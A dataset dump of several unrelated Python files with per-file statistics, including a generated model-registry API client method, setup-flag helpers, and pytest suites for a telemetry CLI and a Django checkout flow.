>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_model_version_with_http_info(owner, model, version_name, body, **kwargs) # noqa: E501
def update_model_version_with_http_info(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Update model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_model_version_with_http_info(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'version_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'version_name' is set
if self.api_client.client_side_validation and ('version_name' not in local_var_params or # noqa: E501
local_var_params['version_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `version_name` when calling `update_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
if 'version_name' in local_var_params:
path_params['version.name'] = local_var_params['version_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions/{version.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.726227
| 133
| 0.59181
| 17,091
| 153,583
| 5.083319
| 0.016032
| 0.050553
| 0.080733
| 0.026335
| 0.985393
| 0.984772
| 0.983391
| 0.980997
| 0.977567
| 0.977049
| 0
| 0.016612
| 0.33171
| 153,583
| 3,217
| 134
| 47.741063
| 0.829849
| 0.420502
| 0
| 0.805211
| 0
| 0
| 0.185556
| 0.056749
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030397
| false
| 0
| 0.003102
| 0
| 0.063896
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0b52234776b29c7739ac5fde733c4560a788d3f
| 2,118
|
py
|
Python
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 2
|
2020-08-18T08:44:26.000Z
|
2022-01-25T09:22:32.000Z
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 7
|
2020-07-14T18:12:14.000Z
|
2021-09-27T15:08:29.000Z
|
bin/steps.py
|
ynohat/cli-onboard
|
af2a02977b273b760e6864f3841d3ca6c0122549
|
[
"Apache-2.0"
] | 3
|
2020-11-29T12:37:16.000Z
|
2021-09-20T12:51:37.000Z
|
class executionSteps(object):
#This Class will determine the execution steps based on setup.json values
def doCreateNewCpCode(self, setup_json_content):
if setup_json_content['property_info']['default_cpcode']['create_new_cpcode'] is True:
return True
else:
return False
def doPropertyActivateStaging(self, setup_json_content):
if setup_json_content['activate_property_staging'] is True:
return True
else:
return False
def doPropertyActivateProduction(self, setup_json_content):
if setup_json_content['activate_property_production'] is True:
return True
else:
return False
def doWafAddSelectedHosts(self, setup_json_content):
if setup_json_content['update_waf_info']['add_selected_host'] is True:
return True
else:
return False
def doWafUpdateMatchTarget(self, setup_json_content):
if setup_json_content['update_waf_info']['update_match_target'] is True:
return True
else:
return False
def doWafActivateStaging(self, setup_json_content):
if setup_json_content['activate_waf_policy_staging'] is True:
return True
else:
return False
def doWafActivateProduction(self, setup_json_content):
if setup_json_content['activate_waf_policy_production'] is True:
return True
else:
return False
def doWafAddSelectedHosts(self, setup_json_content):
if 'update_waf_info' in setup_json_content:
if setup_json_content['update_waf_info']['add_selected_host'] is True:
return True
else:
return False
else:
return False
def doWafUpdateMatchTarget(self, setup_json_content):
if 'update_waf_info' in setup_json_content:
if setup_json_content['update_waf_info']['update_match_target'] is True:
return True
else:
return False
else:
return False
| 33.619048
| 94
| 0.641643
| 235
| 2,118
| 5.468085
| 0.204255
| 0.147082
| 0.249027
| 0.154086
| 0.811673
| 0.811673
| 0.811673
| 0.811673
| 0.753307
| 0.689494
| 0
| 0
| 0.298395
| 2,118
| 62
| 95
| 34.16129
| 0.864738
| 0.033994
| 0
| 0.788462
| 0
| 0
| 0.154523
| 0.05379
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173077
| false
| 0
| 0
| 0
| 0.576923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e0bca019ee3625793e7aaea5172686754ab5d98c
| 42
|
py
|
Python
|
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
books/tech/py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_24-modules_packs/27-file_dir_priorities-04/main.py
|
ordinary-developer/education
|
1b1f40dacab873b28ee01dfa33a9bd3ec4cfed58
|
[
"MIT"
] | null | null | null |
import sub
print(sub)
print(sub.__path__)
| 10.5
| 19
| 0.785714
| 7
| 42
| 4.142857
| 0.571429
| 0.551724
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 3
| 20
| 14
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
e0e071760e3058bfa6882af8624640f0ccbcb344
| 856
|
py
|
Python
|
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | 2
|
2021-01-28T20:22:33.000Z
|
2021-08-25T10:56:25.000Z
|
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | null | null | null |
python/cgp_maya_utils/constants/__init__.py
|
cgpilou/cgp_maya_utils
|
fa839233da18931f18d11ebe6d542664e6515328
|
[
"MIT"
] | null | null | null |
"""
constants used to manipulate maya data
"""
# imports local
from ._constants import (AttributeType,
ComponentType,
Environment,
GeometryData,
InfluenceAssociation,
NodeType,
RotateOrder,
Solver,
SurfaceAssociation,
TangentType,
Transform,
WorldUpType)
__all__ = ['AttributeType',
'ComponentType',
'Environment',
'GeometryData',
'InfluenceAssociation',
'NodeType',
'RotateOrder',
'Solver',
'SurfaceAssociation',
'TangentType',
'Transform',
'WorldUpType']
| 26.75
| 46
| 0.418224
| 36
| 856
| 9.805556
| 0.638889
| 0.147309
| 0.209632
| 0.27762
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0.810198
| 0
| 0
| 0.51285
| 856
| 31
| 47
| 27.612903
| 0.846523
| 0.061916
| 0
| 0
| 0
| 0
| 0.179874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e0fe8fea7204265debda90348c2e5451e72f2a79
| 13,901
|
py
|
Python
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 17
|
2016-02-10T14:50:36.000Z
|
2022-02-25T03:35:15.000Z
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 39
|
2016-02-06T09:07:43.000Z
|
2017-09-09T14:58:58.000Z
|
pytelemetrycli/test/test_cli.py
|
Overdrivr/pytelemetry-cli
|
8969ab7515341b9821ba70bab93d4db9c6b7ccf5
|
[
"MIT"
] | 8
|
2016-03-13T16:17:52.000Z
|
2021-03-12T17:10:55.000Z
|
from pytelemetrycli.cli import Application
import pytest
from unittest.mock import MagicMock
import cmd
import io
import sys
import queue
class TransportMock:
def __init__(self):
self.q = queue.Queue()
self.canConnect = False
self.counter = 0
def authorizeConnect(self,value):
self.canConnect = value
def connect(self,options):
print("TransportMock trying to connect")
if not self.canConnect:
raise IOError("TransportMock denied connection")
print("TransportMock connected")
def disconnect(self):
pass
def read(self, maxbytes=1):
amount = maxbytes if self.q.qsize() > maxbytes else self.q.qsize()
self.counter += amount
data = []
for i in range(amount):
data.append(self.q.get())
return data
def readable(self):
return self.q.qsize()
def write(self, data):
for c in data:
self.q.put(c)
def writeable(self):
return True
def resetStats(self,averaging_window=1):
self.counter = 0
def stats(self):
return {
"rx_bytes": self.counter,
"tx_bytes" : 0,
"rx_chunks" : 0,
"tx_chunks" : 0,
"rx_in_waiting" : 0,
"rx_in_waiting_avg" : 0,
"rx_in_waiting_max" : 0
}
def clear(stream):
stream.truncate(0)
stream.seek(0)
def test_pub_ls():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("pub --f32 topicA 0.4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicA' : 0.4 [float32]\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "topicA\n"
clear(outstream)
tlm.onecmd("pub --f32 topicB 0.4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicB' : 0.4 [float32]\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "topicA\ntopicB\n"
clear(outstream)
tlm.onecmd("pub --i16 topicC 0.0") # Casting from float to int generates negligeable error. Publish will succeed
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'topicC' : 0 [int16]\n"
clear(outstream)
tlm.onecmd("pub --i16 topicC 0.1") # Casting from float to int generates non-negligeable error. Publish will fail
tlm.runner.update()
assert outstream.getvalue() == "Aborted : Wrote decimal number (0.1) with integer flag.\n"
clear(outstream)
def test_connect_fail():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 9600 (bauds).\n"
clear(outstream)
tlm.onecmd("serial com123 -b 115200")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 115200 (bauds).\n"
clear(outstream)
tlm.onecmd("serial com123 --bauds 57600")
tlm.runner.update()
assert outstream.getvalue() == "Failed to connect to com123 at 57600 (bauds).\n"
clear(outstream)
def test_print():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("pub --i32 foo 2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 2 [int32]\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 3")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 3 [int32]\n"
clear(outstream)
tlm.onecmd("pub --s hello world")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'hello' : world [string]\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 4")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 4 [int32]\n"
clear(outstream)
tlm.onecmd("print foo")
tlm.runner.update()
assert outstream.getvalue() == "4\n"
clear(outstream)
tlm.onecmd("print foo -l 3")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo -l 2")
tlm.runner.update()
assert outstream.getvalue() == "3\n4\n"
clear(outstream)
tlm.onecmd("print foo --limit 3")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo --limit 10")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print foo -a")
tlm.runner.update()
assert outstream.getvalue() == "2\n3\n4\n"
clear(outstream)
tlm.onecmd("print qux")
tlm.runner.update()
assert outstream.getvalue() == "Topic 'qux' unknown. Type 'ls' to list all available topics.\n"
clear(outstream)
tlm.onecmd("print hello")
tlm.runner.update()
assert outstream.getvalue() == "world\n"
clear(outstream)
tlm.onecmd("print foo -l 2.3")
tlm.runner.update()
assert outstream.getvalue() == "Could not cast --limit = '2.3' to integer. Using 1.\n4\n"
clear(outstream)
def test_count():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("pub --i32 foo 2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 2 [int32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "foo : 1\n"
clear(outstream)
tlm.onecmd("pub --i32 foo 3")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'foo' : 3 [int32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "foo : 2\n"
clear(outstream)
tlm.onecmd("pub --f32 bar 4.2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'bar' : 4.2 [float32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
print(outstream.getvalue())
for i in tlm.topics.topic_list.items():
print(i)
assert outstream.getvalue() == "bar : 1\nfoo : 2\n"
clear(outstream)
def test_disconnect_quit():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.onecmd("disconnect")
assert outstream.getvalue() == "Disconnected.\n"
clear(outstream)
pytest.raises(SystemExit, tlm.onecmd, "quit")
assert outstream.getvalue() == "Disconnected.\nGood Bye!\n"
clear(outstream)
def test_wrong_command():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
# Just check it doesn't raises
tlm.onecmd("pub foo --i32 123")
clear(outstream)
def test_info():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
# Just check it doesn't raise
tlm.onecmd("info")
clear(outstream)
# issue here
def test_topics_are_cleared_after_reconnect():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.runner._start_thread = MagicMock() # Mock _start_thread to avoid starting thread
tr.authorizeConnect(True)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Connected to com123 at 9600 (bauds).\n"
clear(outstream)
tlm.onecmd("pub --f32 bar 4.2")
tlm.runner.update()
assert outstream.getvalue() == "Published on topic 'bar' : 4.2 [float32]\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "bar : 1\n"
clear(outstream)
tlm.onecmd("disconnect")
assert outstream.getvalue() == "Disconnected.\n"
clear(outstream)
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == "bar : 1\n"
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == "bar\n"
clear(outstream)
tlm.onecmd("serial com123")
tlm.runner.update()
assert outstream.getvalue() == "Connected to com123 at 9600 (bauds).\n"
clear(outstream)
# After the re-connection all previous topics should be cleared
tlm.onecmd("count")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
tlm.onecmd("ls")
tlm.runner.update()
assert outstream.getvalue() == ""
clear(outstream)
# Here too
def test_stats():
tr = TransportMock()
outstream = io.StringIO()
tlm = Application(transport=tr,stdout=outstream)
tlm.runner._start_thread = MagicMock() # Mock _start_thread to avoid starting thread
tr.resetStats()
tlm.runner.resetStats()
tlm.telemetry.resetStats()
tlm.onecmd("stats")
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 0\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : 0.0\n" in outstream.getvalue()
assert "\tbaudratio : 0.0\n" in outstream.getvalue()
assert "\tbaudratio_avg : 0.0\n" in outstream.getvalue()
assert "\tbaudspeed_avg : 0.0\n" in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_complete_frames : 0\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
tlm.onecmd("pub --i32 foo 2")
clear(outstream)
tlm.runner.update()
tlm.onecmd("stats")
speeds = tlm.runner.stats()
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 14\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : {0}\n".format(speeds['baudspeed']) in outstream.getvalue()
assert "\tbaudratio : {0}\n".format(speeds['baudratio']) in outstream.getvalue()
assert "\tbaudratio_avg : {0}\n".format(speeds['baudratio_avg']) in outstream.getvalue()
assert "\tbaudspeed_avg : {0}\n".format(speeds['baudspeed_avg']) in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 1\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 12\n" in outstream.getvalue()
assert "\trx_complete_frames : 1\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 14\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 1\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 1\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
# Check stats are cleaned after restart
tr.authorizeConnect(True)
tlm.onecmd("serial com123")
clear(outstream)
tlm.onecmd("stats")
assert "Raw IO:\n" in outstream.getvalue()
assert "\trx_bytes : 0\n" in outstream.getvalue()
assert "IO speeds:\n" in outstream.getvalue()
assert "\tbaudspeed : 0.0\n" in outstream.getvalue()
assert "\tbaudratio : 0.0\n" in outstream.getvalue()
assert "\tbaudratio_avg : 0.0\n" in outstream.getvalue()
assert "\tbaudspeed_avg : 0.0\n" in outstream.getvalue()
assert "Framing:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_uncomplete_frames : 0\n" in outstream.getvalue()
assert "\ttx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_complete_frames : 0\n" in outstream.getvalue()
assert "\ttx_escaped_bytes : 0\n" in outstream.getvalue()
assert "\trx_discarded_bytes : 0\n" in outstream.getvalue()
assert "\trx_processed_bytes : 0\n" in outstream.getvalue()
assert "\trx_escaped_bytes : 0\n" in outstream.getvalue()
assert "Protocol:\n" in outstream.getvalue()
assert "\ttx_encoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_header : 0\n" in outstream.getvalue()
assert "\trx_decoded_frames : 0\n" in outstream.getvalue()
assert "\trx_corrupted_payload : 0\n" in outstream.getvalue()
assert "\trx_corrupted_crc : 0\n" in outstream.getvalue()
assert "\trx_corrupted_eol : 0\n" in outstream.getvalue()
assert "\trx_corrupted_topic : 0\n" in outstream.getvalue()
| 30.351528
| 117
| 0.660096
| 1,801
| 13,901
| 5.014992
| 0.120489
| 0.21457
| 0.151461
| 0.190988
| 0.812888
| 0.787312
| 0.753543
| 0.72066
| 0.702724
| 0.673605
| 0
| 0.023863
| 0.201137
| 13,901
| 457
| 118
| 30.417943
| 0.789464
| 0.029998
| 0
| 0.666667
| 0
| 0
| 0.250724
| 0.014473
| 0
| 0
| 0
| 0
| 0.330409
| 1
| 0.05848
| false
| 0.002924
| 0.020468
| 0.008772
| 0.093567
| 0.040936
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
46180acdbc7ef2eb147e6a886c081c2216cb0986
| 5,129
|
py
|
Python
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 3
|
2020-05-05T12:12:09.000Z
|
2020-05-08T08:48:16.000Z
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 160
|
2020-05-19T13:03:43.000Z
|
2022-03-12T00:35:28.000Z
|
jobs/tests/test_checkout_run_task.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | null | null | null |
import datetime
import time
from unittest import mock
import pytest
from django.utils import timezone
from model_bakery import baker
from carts.models import Cart, CartItem
from orders.models import OrderItem
pytestmark = pytest.mark.django_db
def test_run_job_task_feature_disabled(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
):
settings.FEATURES = {"routes": False}
products[0].third_party_delivery = True
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[0],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[0],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert not [task for task in send_task.call_args_list if "jobs" in task[0][0]]
def test_job_task_third_party_delivery(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
traidoo_region,
):
settings.FEATURES = {"routes": True}
products[0].third_party_delivery = False
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[1],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[1],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert OrderItem.objects.count() == 2
order_item_1 = OrderItem.objects.filter(product__third_party_delivery=True).first()
order_item_2 = OrderItem.objects.filter(product__third_party_delivery=False).first()
assert order_item_1.id != order_item_2.id
assert (
mock.call(
f"/jobs/create/{order_item_1.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
in send_task.call_args_list
)
assert (
mock.call(
f"/jobs/create/{order_item_2.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
not in send_task.call_args_list
)
def test_job_task_seller_delivery(
buyer,
client_buyer,
products,
delivery_address,
delivery_options,
send_task,
logistics_user,
platform_user,
settings,
traidoo_region,
):
settings.FEATURES = {"routes": True}
products[0].third_party_delivery = True
products[0].save()
products[1].third_party_delivery = True
products[1].save()
cart = baker.make(
Cart,
user=buyer,
delivery_address=delivery_address,
earliest_delivery_date=(
datetime.datetime.now() + datetime.timedelta(days=2)
).date(),
)
baker.make(
CartItem,
product=products[0],
cart=cart,
quantity=1,
delivery_option=delivery_options[0],
)
baker.make(
CartItem,
product=products[1],
cart=cart,
quantity=2,
delivery_option=delivery_options[1],
)
assert not OrderItem.objects.first()
response = client_buyer.post("/checkout")
assert response.status_code == 200
assert OrderItem.objects.count() == 2
order_item_1 = OrderItem.objects.filter(delivery_option=delivery_options[1]).first()
order_item_2 = OrderItem.objects.filter(delivery_option=delivery_options[0]).first()
assert order_item_1.id != order_item_2.id
assert (
mock.call(
f"/jobs/create/{order_item_1.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
in send_task.call_args_list
)
assert (
mock.call(
f"/jobs/create/{order_item_2.id}",
http_method="POST",
queue_name="routes",
schedule_time=30,
headers={"Region": traidoo_region.slug},
)
not in send_task.call_args_list
)
| 24.079812
| 88
| 0.619419
| 584
| 5,129
| 5.191781
| 0.160959
| 0.03562
| 0.05343
| 0.076517
| 0.884565
| 0.883245
| 0.875989
| 0.815963
| 0.815963
| 0.815963
| 0
| 0.018324
| 0.276467
| 5,129
| 212
| 89
| 24.193396
| 0.798707
| 0
| 0
| 0.803279
| 0
| 0
| 0.045428
| 0.023396
| 0
| 0
| 0
| 0
| 0.081967
| 1
| 0.016393
| false
| 0
| 0.043716
| 0
| 0.060109
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
